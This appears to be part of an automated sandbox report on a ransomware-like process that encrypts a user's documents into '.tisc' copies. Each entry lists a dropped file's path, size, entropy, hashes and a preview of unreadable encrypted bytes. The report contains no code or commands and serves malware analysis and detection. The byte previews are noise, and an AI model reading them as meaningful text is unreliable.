                                                                                    Preview: ..kx...Dm...1.5Q_.6.,....a..u.....(.aAs....R.G.....B..<W#u...e...<...2`...K.AD.yV.1..q.C..:..9...V..{.|.~..'......N.3Z...N3T.[C.;..{.0.d...r....z..........\.'.u].0f<..X..T...N.3-..W.4..~.TH.`.Q.PU.6.sn.....X..}4)^....{.{....^.|..Z..*l..J.h_..z"_e........./b.HcF.....b.....9.vl.pp_....$.:..Y3.E.1.y.`5....%(J../ .O..EO.g...x...ur....(...F{(Y3...k+..{[c......U..(...i..m.m..X....n..75..J....vS.I.h.n7....g....F.".......B.e...#.T...7_vU.{.q....$.D.Z.."........y.........(........L.2'.;..UN.a.d.....;...g.en...=b.F{...e@.L...'.I.M.?Q.(l..p...4.\...Y.f%.w..H.3.5b&.....'.S:..&^xg.f9.KcL....k..........H.Z....8..../.r.M..._KAx..$rm?.H.J..3..X.oc....6.....dPH...6wT....1......y...)H..JU........\/.......z.u.....v..7.a.l..r......x^D[.....i.z'.R...>.'....[I..P}.Lq8....EN.A.l...O.;8R.7+.A.]...sp..p.@P..`;..=3...WS...y:IN...6.s.{.|..M.H.w>.)s8.....{8f...d.w.t...I......B8.G..'..Aq.`Y.....l$......5H....>...4..l....G..w=..iv..,`..p.@..Zm.c;#...i.W......D
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848237581072393
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yqK+HyX4ntmte3WZt6Nb8QR0UfGYo2vL71x86JtnUVm1Dq0iEKYd3jgbD:yqOQtePC8QRTBnvLlsm1uYKcGD
                                                                                    MD5:48EA06EF69A47380AF0AF4C9A2B8D1FB
                                                                                    SHA1:7DE9443903504E45A63E9C4AB49864E3BD009491
                                                                                    SHA-256:6EE090C12EC9BD31EDA8CEFBF6ADECE4BBE3911603DEDB53009333EBBFF362AC
                                                                                    SHA-512:00F84BCD4803F11E3B1FCBCF70F6AD6FC73B4DB32DE03CAC0EC96BE3AEB98E2B9BE49017443A413AB958F17CAFA334D07F7E951C4AEF1358368FE379B36F3C42
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: I..... }...2.f..bs...bi.......,..M.xg......9..Z?.lY.Y.g.7&S.1......B)...~P5..,...y.......d.V.o....?.}....E"..'...MH.L.q....b7e.....5).W,...Jj.Q.o..>wt..qqzV....z...{ .......D.......l..."X...0....c.......v....m..4|.z1)q...)....E..&d.L..c....H.1.....O.<Y.......!UxS.H.^,.0...........z..4...27...0...E.`e.c.......!..ph.<P.3...h.T...o..r.9.*...;.^^.;...\U...B6.E.L.zdVv>q...Bp.s...-L.?yZ?.n..e.Y/...O......U.c..Z..}.P....N..1r.n....g.G...A.!tw$Z....y.Y8B~......P..Kc..g....m*.A.B...N&76...-#..,4O..%..".7}j.>G..K[...0..L.6.RT...=m.K.K.D.j.......'..W....."3..k]...C..&.T.$.z.$.N.0g.#.V#.v.7..O0^.~.T..O[m.0...M@..z...........N..~`...B....45_.^.4i...D..A...{.....iG.......d<.b8.)FQ.H.6.L...{...!. .}ZV..._.i\....4~.........ty...^..N.Lb.b;...<C...q.....R..\.$8 ..?....dMm.[U....9".o.mLii...~....Y..D..*....q..9........8.......e.F/P..Y.Q..5..D......@.:.....3......i..^.)l...C....>.....kX..v}..j_ 5.E.{I$.Q...$`......a.......<....4.Ry......].'...-...$..c...
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.848237581072393
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yqK+HyX4ntmte3WZt6Nb8QR0UfGYo2vL71x86JtnUVm1Dq0iEKYd3jgbD:yqOQtePC8QRTBnvLlsm1uYKcGD
                                                                                    MD5:48EA06EF69A47380AF0AF4C9A2B8D1FB
                                                                                    SHA1:7DE9443903504E45A63E9C4AB49864E3BD009491
                                                                                    SHA-256:6EE090C12EC9BD31EDA8CEFBF6ADECE4BBE3911603DEDB53009333EBBFF362AC
                                                                                    SHA-512:00F84BCD4803F11E3B1FCBCF70F6AD6FC73B4DB32DE03CAC0EC96BE3AEB98E2B9BE49017443A413AB958F17CAFA334D07F7E951C4AEF1358368FE379B36F3C42
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: I..... }...2.f..bs...bi.......,..M.xg......9..Z?.lY.Y.g.7&S.1......B)...~P5..,...y.......d.V.o....?.}....E"..'...MH.L.q....b7e.....5).W,...Jj.Q.o..>wt..qqzV....z...{ .......D.......l..."X...0....c.......v....m..4|.z1)q...)....E..&d.L..c....H.1.....O.<Y.......!UxS.H.^,.0...........z..4...27...0...E.`e.c.......!..ph.<P.3...h.T...o..r.9.*...;.^^.;...\U...B6.E.L.zdVv>q...Bp.s...-L.?yZ?.n..e.Y/...O......U.c..Z..}.P....N..1r.n....g.G...A.!tw$Z....y.Y8B~......P..Kc..g....m*.A.B...N&76...-#..,4O..%..".7}j.>G..K[...0..L.6.RT...=m.K.K.D.j.......'..W....."3..k]...C..&.T.$.z.$.N.0g.#.V#.v.7..O0^.~.T..O[m.0...M@..z...........N..~`...B....45_.^.4i...D..A...{.....iG.......d<.b8.)FQ.H.6.L...{...!. .}ZV..._.i\....4~.........ty...^..N.Lb.b;...<C...q.....R..\.$8 ..?....dMm.[U....9".o.mLii...~....Y..D..*....q..9........8.......e.F/P..Y.Q..5..D......@.:.....3......i..^.)l...C....>.....kX..v}..j_ 5.E.{I$.Q...$`......a.......<....4.Ry......].'...-...$..c...
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855068796023753
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ZBRYpMJdHI/ROEKgbuLfMbOfgu3kgyc+58Rsj96N5e/yKG2lYM5jW5tgbD:ZHYpMAROzeuig+8RsB0e/s2CX50D
                                                                                    MD5:D235DA2BEAB12F57E83EAFCF37667462
                                                                                    SHA1:F553168E32094D52706491EF38BD9B5E662E1C58
                                                                                    SHA-256:0DE3D517ACFAC46EB0D3913478717D19B0FAB0A8301CD90B4F26602368495E14
                                                                                    SHA-512:E138F9B9ED7F70F7B2E38314D4B9786398B82EA49E27DA2295BC0153A2C92DCADB41615159ED73558D4EEEA246DBC6C294B1B826E08C4FAF144D820500C78ADF
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..s...hy...Zu............P.o...(p3.z..C.GBxo......`....U....3.kMvk..?9......L#Z.n)..."5...&J.."..:..H0./...!$x......Qsg.-...0.!.....r.7.+.z?.....l......x..I...z..../....%...."D....:.h.J..hh..t..-........f.7#..&..a..;.....v.}...bfG!s.o.%...E.l.@....(<I........r..E......^.W..t.r.>....E&q..5.8V.y9...;.V.S...w......BY.-... H.5..cT.M....7..65.?....nx..K....;.......?....d.....?r. .Q..Yyb9...~/(.*. .....Ix...Z2.w.....8......w.y>)-..UZ.y..p........9E.....v..*.5.....S.Lq.duh.t>...|N.d-..h.k\.x.,....S.l..*..p.1s...{B...L..R...=..0=.....e_../..:}....d4....... ....o."n...yp..<:)6.hk.h.8s........`.e(.,.S.,|.J.........G...Q.9.j..;.../0..\h.M.goL.,._..Su_.v..........E.a.i..x.w..(...b.nW._........*.&<&..>........T....n.%/.....l....\......']%.|...6....k.P}.~........3(..K..d.`.p8!.Q....|....l.._;B.E......[.........X.-0..fb....OxFul....1$JP......j9....*..j...*H<......_.@..z.J.....p...].....p..2v.b.D>H..twL. D.0...Yq...X..1....0.3.i...:%.....M.....'T.
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855068796023753
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ZBRYpMJdHI/ROEKgbuLfMbOfgu3kgyc+58Rsj96N5e/yKG2lYM5jW5tgbD:ZHYpMAROzeuig+8RsB0e/s2CX50D
                                                                                    MD5:D235DA2BEAB12F57E83EAFCF37667462
                                                                                    SHA1:F553168E32094D52706491EF38BD9B5E662E1C58
                                                                                    SHA-256:0DE3D517ACFAC46EB0D3913478717D19B0FAB0A8301CD90B4F26602368495E14
                                                                                    SHA-512:E138F9B9ED7F70F7B2E38314D4B9786398B82EA49E27DA2295BC0153A2C92DCADB41615159ED73558D4EEEA246DBC6C294B1B826E08C4FAF144D820500C78ADF
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..s...hy...Zu............P.o...(p3.z..C.GBxo......`....U....3.kMvk..?9......L#Z.n)..."5...&J.."..:..H0./...!$x......Qsg.-...0.!.....r.7.+.z?.....l......x..I...z..../....%...."D....:.h.J..hh..t..-........f.7#..&..a..;.....v.}...bfG!s.o.%...E.l.@....(<I........r..E......^.W..t.r.>....E&q..5.8V.y9...;.V.S...w......BY.-... H.5..cT.M....7..65.?....nx..K....;.......?....d.....?r. .Q..Yyb9...~/(.*. .....Ix...Z2.w.....8......w.y>)-..UZ.y..p........9E.....v..*.5.....S.Lq.duh.t>...|N.d-..h.k\.x.,....S.l..*..p.1s...{B...L..R...=..0=.....e_../..:}....d4....... ....o."n...yp..<:)6.hk.h.8s........`.e(.,.S.,|.J.........G...Q.9.j..;.../0..\h.M.goL.,._..Su_.v..........E.a.i..x.w..(...b.nW._........*.&<&..>........T....n.%/.....l....\......']%.|...6....k.P}.~........3(..K..d.`.p8!.Q....|....l.._;B.E......[.........X.-0..fb....OxFul....1$JP......j9....*..j...*H<......_.@..z.J.....p...].....p..2v.b.D>H..twL. D.0...Yq...X..1....0.3.i...:%.....M.....'T.
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.853419808143101
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yEnxsX8qH6B65iJyZUDNuP/iGXPR+sLl73nFHlao0z3mvaQOBCwjf//gbD:ynXta64gZUDNuP/igJXRnFFao0z3mSQ7
                                                                                    MD5:04D70E3AFCC3FC9F9218839D766269C6
                                                                                    SHA1:D71EC14144F38F646D7E8E6B1F0C6D23A7B987FD
                                                                                    SHA-256:8ED589E9816C1E0443A8AA5D50C2F52C8272FDE104535794BAF94B78C6FA5FF7
                                                                                    SHA-512:7C297E57298FA839D17BF5BFDD567DA8723808343EAB074661772B01678D0B3710DEB6D06D2E890E610D12A501DBB8E4BE7095BDCCDEE40B18BC16A156F6DA5F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: hH.JZ.,....k.L..=.c{.....J.....X......Tc?..B3e..f..3..@.;..J\..w.:..E.#....>.g..,..J....6Tj...3&...t.I.........3t..l.v'_...A..0.58....F.....{#...?.;.Z..&.>/#J.C....}..cKR=....s.....j?.v.7......_....ZS..$D.U=... .M...L..]...r..A].g...........Ja.E...h.(.k.!......'......L..}.iD....u....q...e......`=N~...*..4....3u.O.%...#'D...i...#....i...6.?....&..;;+.M....'..I...:x...J....._a9i*....5.g.F.g.....g.R.D.)Z.?C.W.p(.U..4J.2Q...M...o..h.\."....L..ED.P....r.L......|.X.4.sOp._.U.o.D.}. .....3..e%!0....dJKV..G....I.~.(....;G...E.s.c./....G=..a...............4..BPY.$.+.^.JM.l...O.#*...E..r..By.\.^..h....s............\2....].8..`...&&..t.<.....A.".G...k.B.t.G..c\..*~k..5..#?.L...o..=..7.....e^.....N.....}.....-..Q7..v^O9..gQD..m...g57..(|.e..).7TIQI.H..j....u.]m]...R...`..i.....;|...E.{.!.J..F2...,........b;....r..e.I..".>.x.>k|.8.[......6I[.U!".9.O.krqv.C.....L1T.5`...a...L..GlZ..*.......?%..H..2..6&.&'......3d..=..HO|w...^..e..aI..z[...;q
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.853419808143101
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:yEnxsX8qH6B65iJyZUDNuP/iGXPR+sLl73nFHlao0z3mvaQOBCwjf//gbD:ynXta64gZUDNuP/igJXRnFFao0z3mSQ7
                                                                                    MD5:04D70E3AFCC3FC9F9218839D766269C6
                                                                                    SHA1:D71EC14144F38F646D7E8E6B1F0C6D23A7B987FD
                                                                                    SHA-256:8ED589E9816C1E0443A8AA5D50C2F52C8272FDE104535794BAF94B78C6FA5FF7
                                                                                    SHA-512:7C297E57298FA839D17BF5BFDD567DA8723808343EAB074661772B01678D0B3710DEB6D06D2E890E610D12A501DBB8E4BE7095BDCCDEE40B18BC16A156F6DA5F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: hH.JZ.,....k.L..=.c{.....J.....X......Tc?..B3e..f..3..@.;..J\..w.:..E.#....>.g..,..J....6Tj...3&...t.I.........3t..l.v'_...A..0.58....F.....{#...?.;.Z..&.>/#J.C....}..cKR=....s.....j?.v.7......_....ZS..$D.U=... .M...L..]...r..A].g...........Ja.E...h.(.k.!......'......L..}.iD....u....q...e......`=N~...*..4....3u.O.%...#'D...i...#....i...6.?....&..;;+.M....'..I...:x...J....._a9i*....5.g.F.g.....g.R.D.)Z.?C.W.p(.U..4J.2Q...M...o..h.\."....L..ED.P....r.L......|.X.4.sOp._.U.o.D.}. .....3..e%!0....dJKV..G....I.~.(....;G...E.s.c./....G=..a...............4..BPY.$.+.^.JM.l...O.#*...E..r..By.\.^..h....s............\2....].8..`...&&..t.<.....A.".G...k.B.t.G..c\..*~k..5..#?.L...o..=..7.....e^.....N.....}.....-..Q7..v^O9..gQD..m...g57..(|.e..).7TIQI.H..j....u.]m]...R...`..i.....;|...E.{.!.J..F2...,........b;....r..e.I..".>.x.>k|.8.[......6I[.U!".9.O.krqv.C.....L1T.5`...a...L..GlZ..*.......?%..H..2..6&.&'......3d..=..HO|w...^..e..aI..z[...;q
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.847077044850384
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:PshA1FuXuSLoHtvvzojpipodeGxXn+7S7RMl8/e72EF5y/gbD:PsWnSIvvjaRln+uV59EDyyD
                                                                                    MD5:71F9CDE5836C020F91043B43C72DC9CF
                                                                                    SHA1:E2EB58938C232896C479627E0C064BA8B97AA026
                                                                                    SHA-256:A0A4AEC0B2DED291D325580A7D578A7878583F06052C7C97E0D60A4E2E669F8D
                                                                                    SHA-512:F263691B90BCD4E7481958BE6EE1F305D3D30E6009CFDE6301BF4CC5C53AD6647712E33467C6F4C89915A65D1B9124ABA6A051C42F521A13356064F2A703E09E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...M.:.2t'.%=X.8.a.x...y..........`..e..}.dO!....-..f..0~.....9.....x....li..y-.`0\\.I..I2cu..wk4.gW...O..._.t...E......Q...R....tl...N.. Q{...m.0 .J..[..X....\(.bh....T..(H.]&...."....r........_...~....d.]...3..z.b...,...4.O..Pk.6\.z.XL.E..*.O.....[T.@x.e.p.D1..&....`......m....:...fP.T..V.,..7......a.D.S....w..[....h.......^....k].;.j..W>..).0~...A}p...."........?...*l..A..2....;..31..#........VR......A..i&._...Z.u...$7..R..qx;$....r..iJW.w..a..E.ZsL.a........g...m.~4D.oT"..Y..x...#.#.,..2iD.E..W...3..........Bp.{<...@zw7.7L[N:.D...0..=.\]..l....$Yr6..._2....Om....M..I.?d.D>.N.........(.>.....}\f.!P..o..N...=S.*$.Z...u.+@...|..<o:1.1`.x~S...R.D.4.k....)..r .c.....22.an.......s....HV.L...%...K.Sd}..d...HL.Lz...9............i?....F^?'.PX1=....o..d-C+...G..'a.Ndv....@.~.o_...9.~..]..{...C..r....E............7.D..!.$nE..~.1 ...W.....Mr*4JF.......-.....j......i...VV..K.bR.s.-.....7....3K..hD..WTRN..w........{.A..vJ...r...P
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.847077044850384
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:PshA1FuXuSLoHtvvzojpipodeGxXn+7S7RMl8/e72EF5y/gbD:PsWnSIvvjaRln+uV59EDyyD
                                                                                    MD5:71F9CDE5836C020F91043B43C72DC9CF
                                                                                    SHA1:E2EB58938C232896C479627E0C064BA8B97AA026
                                                                                    SHA-256:A0A4AEC0B2DED291D325580A7D578A7878583F06052C7C97E0D60A4E2E669F8D
                                                                                    SHA-512:F263691B90BCD4E7481958BE6EE1F305D3D30E6009CFDE6301BF4CC5C53AD6647712E33467C6F4C89915A65D1B9124ABA6A051C42F521A13356064F2A703E09E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...M.:.2t'.%=X.8.a.x...y..........`..e..}.dO!....-..f..0~.....9.....x....li..y-.`0\\.I..I2cu..wk4.gW...O..._.t...E......Q...R....tl...N.. Q{...m.0 .J..[..X....\(.bh....T..(H.]&...."....r........_...~....d.]...3..z.b...,...4.O..Pk.6\.z.XL.E..*.O.....[T.@x.e.p.D1..&....`......m....:...fP.T..V.,..7......a.D.S....w..[....h.......^....k].;.j..W>..).0~...A}p...."........?...*l..A..2....;..31..#........VR......A..i&._...Z.u...$7..R..qx;$....r..iJW.w..a..E.ZsL.a........g...m.~4D.oT"..Y..x...#.#.,..2iD.E..W...3..........Bp.{<...@zw7.7L[N:.D...0..=.\]..l....$Yr6..._2....Om....M..I.?d.D>.N.........(.>.....}\f.!P..o..N...=S.*$.Z...u.+@...|..<o:1.1`.x~S...R.D.4.k....)..r .c.....22.an.......s....HV.L...%...K.Sd}..d...HL.Lz...9............i?....F^?'.PX1=....o..d-C+...G..'a.Ndv....@.~.o_...9.~..]..{...C..r....E............7.D..!.$nE..~.1 ...W.....Mr*4JF.......-.....j......i...VV..K.bR.s.-.....7....3K..hD..WTRN..w........{.A..vJ...r...P
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8488327863432215
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:IARdK1rg1FYLO4R2fwzIZPePoBY85dZBXOizF2qVJlRWOtp9260RvIreeaAWYgbD:IaI1c1Oa4AfxZmAu8Z53F3JlTp9260ya
                                                                                    MD5:4942ED8224E32F8456A9EA12A18EB814
                                                                                    SHA1:3C70181B510DBCD8A7944B79C6A5A5BB6D4C6DCD
                                                                                    SHA-256:A3B6898F6236DAEB94A7802B7FE0945B221CE3A53D037945B7348A5C6ECA7B5B
                                                                                    SHA-512:EDE2319C4C8496CF62CFEE2A2DCC8B60314B810A9AA9D0E26F211601FC2436FEA932776782EEEE251469887A275DD7B76E592933C5B617CF6429D161693EC6BB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...A5e.c.*...;......%.7.h-n5....F\.j.0.Q.9...2...~..d4....|P5.@.......8#t.....0...T.....W.4.rZ..w....}p*c......&...b.p.B#.....(..H.....1._9'".....A.Q....1KG..\...0.C..LY]...g.Ih.y...w8.A....L..IE1...3.n..;..$.:.. ZL.&..J.~..l.B.Y i..s|@...J.BwI_.e..g.b...r.~P...U..$.$...J..3?_..Z......P.......Z."..K%..(z{FYE[}.D.9....oU.......OJ..'..M..).Yx...iX......u...{n......D...^$p..v....N...?.T.S&=....P.<..b^..qAus' .)..r.....kk...1......d.z..i.[cJ=.c.~..D_S$\./...A.....^.]]Dd.....6..Z....-..4....x..N:...}:;.lL...A..8W.T9..]...>>k...'s.........K.E.A...Z.PT...?.r....I..G|....\.'6...}..T}.._^.El......XDE....5.M..G.......gZ...........2.......j.@.1Q.z.C.2.......)>..%.B.6...'.sv..K...F......R*l,!3.4...s.g?f.8...q..C.d-...pa..|C............fz...(.Y0L*...|Q..R....x.3....Sl....H..M^.....C,.p.2..|....wx.X...U.bl..G7.......I...#......,-m.$.../.).|kV.....l....D^......?...v...5.VI.Q%.j.:....i........J.U..QD........f!..W/q..}...L.>.....`..{..U.[......
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8488327863432215
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:IARdK1rg1FYLO4R2fwzIZPePoBY85dZBXOizF2qVJlRWOtp9260RvIreeaAWYgbD:IaI1c1Oa4AfxZmAu8Z53F3JlTp9260ya
                                                                                    MD5:4942ED8224E32F8456A9EA12A18EB814
                                                                                    SHA1:3C70181B510DBCD8A7944B79C6A5A5BB6D4C6DCD
                                                                                    SHA-256:A3B6898F6236DAEB94A7802B7FE0945B221CE3A53D037945B7348A5C6ECA7B5B
                                                                                    SHA-512:EDE2319C4C8496CF62CFEE2A2DCC8B60314B810A9AA9D0E26F211601FC2436FEA932776782EEEE251469887A275DD7B76E592933C5B617CF6429D161693EC6BB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...A5e.c.*...;......%.7.h-n5....F\.j.0.Q.9...2...~..d4....|P5.@.......8#t.....0...T.....W.4.rZ..w....}p*c......&...b.p.B#.....(..H.....1._9'".....A.Q....1KG..\...0.C..LY]...g.Ih.y...w8.A....L..IE1...3.n..;..$.:.. ZL.&..J.~..l.B.Y i..s|@...J.BwI_.e..g.b...r.~P...U..$.$...J..3?_..Z......P.......Z."..K%..(z{FYE[}.D.9....oU.......OJ..'..M..).Yx...iX......u...{n......D...^$p..v....N...?.T.S&=....P.<..b^..qAus' .)..r.....kk...1......d.z..i.[cJ=.c.~..D_S$\./...A.....^.]]Dd.....6..Z....-..4....x..N:...}:;.lL...A..8W.T9..]...>>k...'s.........K.E.A...Z.PT...?.r....I..G|....\.'6...}..T}.._^.El......XDE....5.M..G.......gZ...........2.......j.@.1Q.z.C.2.......)>..%.B.6...'.sv..K...F......R*l,!3.4...s.g?f.8...q..C.d-...pa..|C............fz...(.Y0L*...|Q..R....x.3....Sl....H..M^.....C,.p.2..|....wx.X...U.bl..G7.......I...#......,-m.$.../.).|kV.....l....D^......?...v...5.VI.Q%.j.:....i........J.U..QD........f!..W/q..}...L.>.....`..{..U.[......
                                                                                    C:\Users\user\Documents\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.851403267842275
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:a8Q0pnRyvr0BUWthoskLxqBCOeJQ73Cb7/jackoGKpYAEsQBuqggbD:tzpnR8YBUUhos48pbmK+GkeFu0D
                                                                                    MD5:3E412A9FB691E00BABC30F4181FA97FE
                                                                                    SHA1:BA1706C5999C52035DD5ADA60D0260BADEA5C231
                                                                                    SHA-256:DAB0EE1275C0441F4CA43F41FFF5258D819341811E5E20164102CFF0326D8E85
                                                                                    SHA-512:5152244C616749FBAC80C61CE5793EF1B66DE874B2DBD312A67A82E24E2FE084BB52BB23FB70A1553E1F4B3C1BFF943E0F0C8371C2F1C5964DACCA271691AB10
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....3.....P.u|l.H...wD....b..`f...V]Y7.p......r.2......_Wx+..,.($*..5..*......:..?< .........H".....&..(...s@.n....r.S...a...j5uU.4..........T...?.d.g<......j.JK..=.`..T.%..Xl.Q....:m76......E.>.=...N!kwHK..2....~...v..l...~..(.su.A.->.~.hS.....&.J..9....(.n.t..).B....Sl...7]..M.a.~......V..!C.6F...X|......l`.o.W.]._..y.m....2..#..<'..0..<l\rOng...y.&..e.t.a.Q..p.h?6$J.9......B.t.X2...IK...A...5....ge....0:..3=.a.....8.-.C..V...h.....8j..+iE_....Ys.`H...E...7K..M.%7.>w..q....1..%.!..@J..[F.y&_.4n..U}K+7.b(.9..e`.....J...rC,..Um..?>ijE....z...u8...*.B..I.'f......?.H...3.."N..B.8.$R.`.u....x9|.%.f.V.|...~.r..F.u..X......Pe...c.../cz..^..4....^.J.....jO'..?...$..W..n.{.....X...*[c.-....e#......4}..."...=lO..R..R.N?g.....h'....9m.-......u.].@5?}..}...H$19.{........N.p..o3.=4....V@ +..|...I..P.O.....z..q9....!?.,.......$...,...^m.....'.*...6.c....6...#Ob.Jc.. W.:t...5..6....R..........6.....0b.xI.R.|..aZ(...k..^.../...5.[...A.[8....N.....3...
                                                                                    C:\Users\user\Documents\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.851403267842275
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:a8Q0pnRyvr0BUWthoskLxqBCOeJQ73Cb7/jackoGKpYAEsQBuqggbD:tzpnR8YBUUhos48pbmK+GkeFu0D
                                                                                    MD5:3E412A9FB691E00BABC30F4181FA97FE
                                                                                    SHA1:BA1706C5999C52035DD5ADA60D0260BADEA5C231
                                                                                    SHA-256:DAB0EE1275C0441F4CA43F41FFF5258D819341811E5E20164102CFF0326D8E85
                                                                                    SHA-512:5152244C616749FBAC80C61CE5793EF1B66DE874B2DBD312A67A82E24E2FE084BB52BB23FB70A1553E1F4B3C1BFF943E0F0C8371C2F1C5964DACCA271691AB10
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....3.....P.u|l.H...wD....b..`f...V]Y7.p......r.2......_Wx+..,.($*..5..*......:..?< .........H".....&..(...s@.n....r.S...a...j5uU.4..........T...?.d.g<......j.JK..=.`..T.%..Xl.Q....:m76......E.>.=...N!kwHK..2....~...v..l...~..(.su.A.->.~.hS.....&.J..9....(.n.t..).B....Sl...7]..M.a.~......V..!C.6F...X|......l`.o.W.]._..y.m....2..#..<'..0..<l\rOng...y.&..e.t.a.Q..p.h?6$J.9......B.t.X2...IK...A...5....ge....0:..3=.a.....8.-.C..V...h.....8j..+iE_....Ys.`H...E...7K..M.%7.>w..q....1..%.!..@J..[F.y&_.4n..U}K+7.b(.9..e`.....J...rC,..Um..?>ijE....z...u8...*.B..I.'f......?.H...3.."N..B.8.$R.`.u....x9|.%.f.V.|...~.r..F.u..X......Pe...c.../cz..^..4....^.J.....jO'..?...$..W..n.{.....X...*[c.-....e#......4}..."...=lO..R..R.N?g.....h'....9m.-......u.].@5?}..}...H$19.{........N.p..o3.=4....V@ +..|...I..P.O.....z..q9....!?.,.......$...,...^m.....'.*...6.c....6...#Ob.Jc.. W.:t...5..6....R..........6.....0b.xI.R.|..aZ(...k..^.../...5.[...A.[8....N.....3...
                                                                                    C:\Users\user\Documents\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.83967878375075
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:L5msh44y39DQAPP7tELTE4hg8o6lhLB8Y7RoCyUZhv7jqgzNlPFSHmUn7xKrcv1M:Nn4jJQAPPhELTJK6jBNdlyohCgzfPFSO
                                                                                    MD5:46977B572D06FBC248C5F38FFA003CC9
                                                                                    SHA1:998A24536D6672F0B0F1188B4ED488DAA71130F2
                                                                                    SHA-256:2B315BD9A8B9E9DD70C7A4E8FC6F6911C967D45FBA6FB2342C84F3C696FA4BE0
